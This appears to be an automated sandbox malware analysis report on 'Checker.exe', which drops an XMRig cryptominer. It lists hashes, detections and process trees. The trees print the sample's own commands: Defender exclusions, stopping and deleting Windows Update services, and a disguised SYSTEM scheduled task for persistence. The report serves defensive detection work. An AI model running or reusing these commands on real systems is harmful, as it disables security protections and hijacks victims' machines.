Overview
overview
10Static
static
7Checker.exe
windows7-x64
10Checker.exe
windows10-2004-x64
10LiveCharts.xml
windows7-x64
1LiveCharts.xml
windows10-2004-x64
1LiveCharts...es.dll
windows7-x64
3LiveCharts...es.dll
windows10-2004-x64
3LiveChartsRegion.dll
windows7-x64
3LiveChartsRegion.dll
windows10-2004-x64
3MetroSet UI.dll
windows7-x64
1MetroSet UI.dll
windows10-2004-x64
5NAudio.dll
windows7-x64
1NAudio.dll
windows10-2004-x64
1System.IO....le.dll
windows7-x64
1System.IO....le.dll
windows10-2004-x64
1System.IO....on.dll
windows7-x64
1System.IO....on.dll
windows10-2004-x64
1Vip.Notification.dll
windows7-x64
1Vip.Notification.dll
windows10-2004-x64
1WinMM.Net.dll
windows7-x64
1WinMM.Net.dll
windows10-2004-x64
1World.xml
windows7-x64
1World.xml
windows10-2004-x64
1postproc-54.dll
windows7-x64
1postproc-54.dll
windows10-2004-x64
1swresample-2.dll
windows7-x64
1swresample-2.dll
windows10-2004-x64
1swscale-4.dll
windows7-x64
1swscale-4.dll
windows10-2004-x64
1Analysis
-
max time kernel
152s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
06/07/2023, 10:44
Behavioral task
behavioral1
Sample
Checker.exe
Resource
win7-20230705-en
Behavioral task
behavioral2
Sample
Checker.exe
Resource
win10v2004-20230703-en
Behavioral task
behavioral3
Sample
LiveCharts.xml
Resource
win7-20230703-en
Behavioral task
behavioral4
Sample
LiveCharts.xml
Resource
win10v2004-20230703-en
Behavioral task
behavioral5
Sample
LiveChartsCountries.dll
Resource
win7-20230703-en
Behavioral task
behavioral6
Sample
LiveChartsCountries.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral7
Sample
LiveChartsRegion.dll
Resource
win7-20230705-en
Behavioral task
behavioral8
Sample
LiveChartsRegion.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral9
Sample
MetroSet UI.dll
Resource
win7-20230703-en
Behavioral task
behavioral10
Sample
MetroSet UI.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral11
Sample
NAudio.dll
Resource
win7-20230703-en
Behavioral task
behavioral12
Sample
NAudio.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral13
Sample
System.IO.Compression.ZipFile.dll
Resource
win7-20230703-en
Behavioral task
behavioral14
Sample
System.IO.Compression.ZipFile.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral15
Sample
System.IO.Compression.dll
Resource
win7-20230703-en
Behavioral task
behavioral16
Sample
System.IO.Compression.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral17
Sample
Vip.Notification.dll
Resource
win7-20230703-en
Behavioral task
behavioral18
Sample
Vip.Notification.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral19
Sample
WinMM.Net.dll
Resource
win7-20230703-en
Behavioral task
behavioral20
Sample
WinMM.Net.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral21
Sample
World.xml
Resource
win7-20230703-en
Behavioral task
behavioral22
Sample
World.xml
Resource
win10v2004-20230703-en
Behavioral task
behavioral23
Sample
postproc-54.dll
Resource
win7-20230703-en
Behavioral task
behavioral24
Sample
postproc-54.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral25
Sample
swresample-2.dll
Resource
win7-20230703-en
Behavioral task
behavioral26
Sample
swresample-2.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral27
Sample
swscale-4.dll
Resource
win7-20230703-en
Behavioral task
behavioral28
Sample
swscale-4.dll
Resource
win10v2004-20230703-en
General
-
Target
Checker.exe
-
Size
53.0MB
-
MD5
57afcb97e60f92e2fe43d869d5a432d5
-
SHA1
b29668c32b353efdcab5aa367f761e1f1682ea91
-
SHA256
7c640fe9a4d562fbec6fd8b51daca0a133465845fc4a8de35e2f6af95a8e9611
-
SHA512
70e444062d1bf30ea500e55353d790e7c0a9d0985b4e90f2f008881f44cd68a50e64b46280c38fae8c482fcf2c21d98c3595752bec6e0805032dab07e672407f
-
SSDEEP
786432:PqwfGQxHq+2QrViNeZO4pc+rN15CDL+jAvgRdsFSFo0NV:guVt44p1nsn+jAvgRdsMFoS
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description pid Process procid_target PID 4040 created 2864 4040 Checker.exe 60 PID 4040 created 2864 4040 Checker.exe 60 PID 4040 created 2864 4040 Checker.exe 60 PID 4040 created 2864 4040 Checker.exe 60 PID 3484 created 2864 3484 updater.exe 60 PID 3484 created 2864 3484 updater.exe 60 PID 3484 created 2864 3484 updater.exe 60 PID 3484 created 2864 3484 updater.exe 60 PID 3484 created 2864 3484 updater.exe 60 PID 768 created 2864 768 conhost.exe 60 PID 3484 created 2864 3484 updater.exe 60 -
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/4240-248-0x00007FF730D40000-0x00007FF731534000-memory.dmp xmrig behavioral2/memory/4240-250-0x00007FF730D40000-0x00007FF731534000-memory.dmp xmrig behavioral2/memory/4240-253-0x00007FF730D40000-0x00007FF731534000-memory.dmp xmrig behavioral2/memory/4240-255-0x00007FF730D40000-0x00007FF731534000-memory.dmp xmrig behavioral2/memory/4240-257-0x00007FF730D40000-0x00007FF731534000-memory.dmp xmrig behavioral2/memory/4240-260-0x00007FF730D40000-0x00007FF731534000-memory.dmp xmrig behavioral2/memory/4240-263-0x00007FF730D40000-0x00007FF731534000-memory.dmp xmrig behavioral2/memory/4240-265-0x00007FF730D40000-0x00007FF731534000-memory.dmp xmrig behavioral2/memory/4240-267-0x00007FF730D40000-0x00007FF731534000-memory.dmp xmrig behavioral2/memory/4240-269-0x00007FF730D40000-0x00007FF731534000-memory.dmp xmrig -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 1 IoCs
pid Process 3484 updater.exe -
resource yara_rule behavioral2/memory/4240-248-0x00007FF730D40000-0x00007FF731534000-memory.dmp upx behavioral2/memory/4240-250-0x00007FF730D40000-0x00007FF731534000-memory.dmp upx behavioral2/memory/4240-253-0x00007FF730D40000-0x00007FF731534000-memory.dmp upx behavioral2/memory/4240-255-0x00007FF730D40000-0x00007FF731534000-memory.dmp upx behavioral2/memory/4240-257-0x00007FF730D40000-0x00007FF731534000-memory.dmp upx behavioral2/memory/4240-260-0x00007FF730D40000-0x00007FF731534000-memory.dmp upx behavioral2/memory/4240-263-0x00007FF730D40000-0x00007FF731534000-memory.dmp upx behavioral2/memory/4240-265-0x00007FF730D40000-0x00007FF731534000-memory.dmp upx behavioral2/memory/4240-267-0x00007FF730D40000-0x00007FF731534000-memory.dmp upx behavioral2/memory/4240-269-0x00007FF730D40000-0x00007FF731534000-memory.dmp upx -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3484 set thread context of 768 3484 updater.exe 121 PID 3484 set thread context of 4240 3484 updater.exe 127 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Chrome\updater.exe Checker.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4224 sc.exe 3016 sc.exe 5004 sc.exe 2820 sc.exe 2348 sc.exe 1500 sc.exe 3804 sc.exe 2156 sc.exe 2504 sc.exe 4152 sc.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4644 WMIC.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4040 Checker.exe 4040 Checker.exe 4280 powershell.exe 4280 powershell.exe 4040 Checker.exe 4040 Checker.exe 4040 Checker.exe 4040 Checker.exe 3704 powershell.exe 3704 powershell.exe 4040 Checker.exe 4040 Checker.exe 3800 powershell.exe 3800 powershell.exe 3484 updater.exe 3484 updater.exe 1412 powershell.exe 1412 powershell.exe 3484 updater.exe 3484 updater.exe 3484 updater.exe 3484 updater.exe 3100 powershell.exe 3100 powershell.exe 3484 updater.exe 3484 updater.exe 3484 updater.exe 3484 updater.exe 768 conhost.exe 768 conhost.exe 3484 updater.exe 3484 updater.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe 4240 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 660 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4280 powershell.exe Token: SeDebugPrivilege 3704 powershell.exe Token: SeIncreaseQuotaPrivilege 3704 powershell.exe Token: SeSecurityPrivilege 3704 powershell.exe Token: SeTakeOwnershipPrivilege 3704 powershell.exe Token: SeLoadDriverPrivilege 3704 powershell.exe Token: SeSystemProfilePrivilege 3704 powershell.exe Token: SeSystemtimePrivilege 3704 powershell.exe Token: SeProfSingleProcessPrivilege 3704 powershell.exe Token: SeIncBasePriorityPrivilege 3704 powershell.exe Token: SeCreatePagefilePrivilege 3704 powershell.exe Token: SeBackupPrivilege 3704 powershell.exe Token: SeRestorePrivilege 3704 powershell.exe Token: SeShutdownPrivilege 3704 powershell.exe Token: SeDebugPrivilege 3704 powershell.exe Token: SeSystemEnvironmentPrivilege 3704 powershell.exe Token: SeRemoteShutdownPrivilege 3704 powershell.exe Token: SeUndockPrivilege 3704 powershell.exe Token: SeManageVolumePrivilege 3704 powershell.exe Token: 33 3704 powershell.exe Token: 34 3704 powershell.exe Token: 35 3704 powershell.exe Token: 36 3704 powershell.exe Token: SeIncreaseQuotaPrivilege 3704 powershell.exe Token: SeSecurityPrivilege 3704 powershell.exe Token: SeTakeOwnershipPrivilege 3704 powershell.exe Token: SeLoadDriverPrivilege 3704 powershell.exe Token: SeSystemProfilePrivilege 3704 powershell.exe Token: SeSystemtimePrivilege 3704 powershell.exe Token: SeProfSingleProcessPrivilege 3704 powershell.exe Token: SeIncBasePriorityPrivilege 3704 powershell.exe Token: SeCreatePagefilePrivilege 3704 powershell.exe Token: SeBackupPrivilege 3704 powershell.exe Token: SeRestorePrivilege 3704 powershell.exe Token: SeShutdownPrivilege 3704 powershell.exe Token: SeDebugPrivilege 3704 powershell.exe Token: SeSystemEnvironmentPrivilege 3704 powershell.exe Token: SeRemoteShutdownPrivilege 3704 powershell.exe Token: SeUndockPrivilege 3704 powershell.exe Token: SeManageVolumePrivilege 3704 powershell.exe Token: 33 3704 powershell.exe Token: 34 3704 powershell.exe Token: 35 3704 powershell.exe Token: 36 3704 powershell.exe Token: SeIncreaseQuotaPrivilege 3704 powershell.exe Token: SeSecurityPrivilege 3704 powershell.exe Token: SeTakeOwnershipPrivilege 3704 powershell.exe Token: SeLoadDriverPrivilege 3704 powershell.exe Token: SeSystemProfilePrivilege 3704 powershell.exe Token: SeSystemtimePrivilege 3704 powershell.exe Token: SeProfSingleProcessPrivilege 3704 powershell.exe Token: SeIncBasePriorityPrivilege 3704 powershell.exe Token: SeCreatePagefilePrivilege 3704 powershell.exe Token: SeBackupPrivilege 3704 powershell.exe Token: SeRestorePrivilege 3704 powershell.exe Token: SeShutdownPrivilege 3704 powershell.exe Token: SeDebugPrivilege 3704 powershell.exe Token: SeSystemEnvironmentPrivilege 3704 powershell.exe Token: SeRemoteShutdownPrivilege 3704 powershell.exe Token: SeUndockPrivilege 3704 powershell.exe Token: SeManageVolumePrivilege 3704 powershell.exe Token: 33 3704 powershell.exe Token: 34 3704 powershell.exe Token: 35 3704 powershell.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 1840 wrote to memory of 2504 1840 cmd.exe 89 PID 1840 wrote to memory of 2504 1840 cmd.exe 89 PID 1840 wrote to memory of 4152 1840 cmd.exe 90 PID 1840 wrote to memory of 4152 1840 cmd.exe 90 PID 1840 wrote to memory of 1500 1840 cmd.exe 91 PID 1840 wrote to memory of 1500 1840 cmd.exe 91 PID 1840 wrote to memory of 3804 1840 cmd.exe 92 PID 1840 wrote to memory of 3804 1840 cmd.exe 92 PID 1840 wrote to memory of 2820 1840 cmd.exe 93 PID 1840 wrote to memory of 2820 1840 cmd.exe 93 PID 1840 wrote to memory of 756 1840 cmd.exe 94 PID 1840 wrote to memory of 756 1840 cmd.exe 94 PID 1840 wrote to memory of 4440 1840 cmd.exe 95 PID 1840 wrote to memory of 4440 1840 cmd.exe 95 PID 1840 wrote to memory of 4204 1840 cmd.exe 96 PID 1840 wrote to memory of 4204 1840 cmd.exe 96 PID 1840 wrote to memory of 1128 1840 cmd.exe 97 PID 1840 wrote to memory of 1128 1840 cmd.exe 97 PID 1840 wrote to memory of 5016 1840 cmd.exe 98 PID 1840 wrote to memory of 5016 1840 cmd.exe 98 PID 3800 wrote to memory of 3632 3800 powershell.exe 102 PID 3800 wrote to memory of 3632 3800 powershell.exe 102 PID 5096 wrote to memory of 2348 5096 cmd.exe 111 PID 5096 wrote to memory of 2348 5096 cmd.exe 111 PID 5096 wrote to memory of 4224 5096 cmd.exe 112 PID 5096 wrote to memory of 4224 5096 cmd.exe 112 PID 5096 wrote to memory of 2156 5096 cmd.exe 113 PID 5096 wrote to memory of 2156 5096 cmd.exe 113 PID 5096 wrote to memory of 3016 5096 cmd.exe 114 PID 5096 wrote to memory of 3016 5096 cmd.exe 114 PID 5096 wrote to memory of 5004 5096 cmd.exe 115 PID 5096 wrote to memory of 5004 5096 cmd.exe 115 PID 5096 wrote to memory of 4052 5096 cmd.exe 116 PID 5096 wrote to memory of 4052 5096 cmd.exe 116 PID 5096 wrote to memory of 2916 5096 cmd.exe 117 PID 5096 wrote to memory of 2916 5096 cmd.exe 117 PID 5096 wrote to memory of 2964 5096 cmd.exe 118 PID 5096 wrote to memory of 2964 5096 cmd.exe 118 PID 5096 wrote to memory of 3840 5096 cmd.exe 119 PID 5096 wrote to memory of 3840 5096 cmd.exe 119 PID 5096 wrote to memory of 1536 5096 cmd.exe 120 PID 5096 wrote to memory of 1536 5096 cmd.exe 120 PID 3484 wrote to memory of 768 3484 updater.exe 121 PID 5104 wrote to memory of 4644 5104 cmd.exe 126 PID 5104 wrote to memory of 4644 5104 cmd.exe 126 PID 3484 wrote to memory of 4240 3484 updater.exe 127 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:2864
-
C:\Users\Admin\AppData\Local\Temp\Checker.exe"C:\Users\Admin\AppData\Local\Temp\Checker.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:4040
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4280
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2504
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4152
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1500
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3804
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2820
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:756
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:4440
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:4204
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:1128
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:5016
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rosbrqmf#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#jcwit#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3800 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:3632
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1412
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2348
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4224
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2156
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3016
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:5004
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4052
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:2916
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵PID:2964
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:3840
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:1536
-
-
-
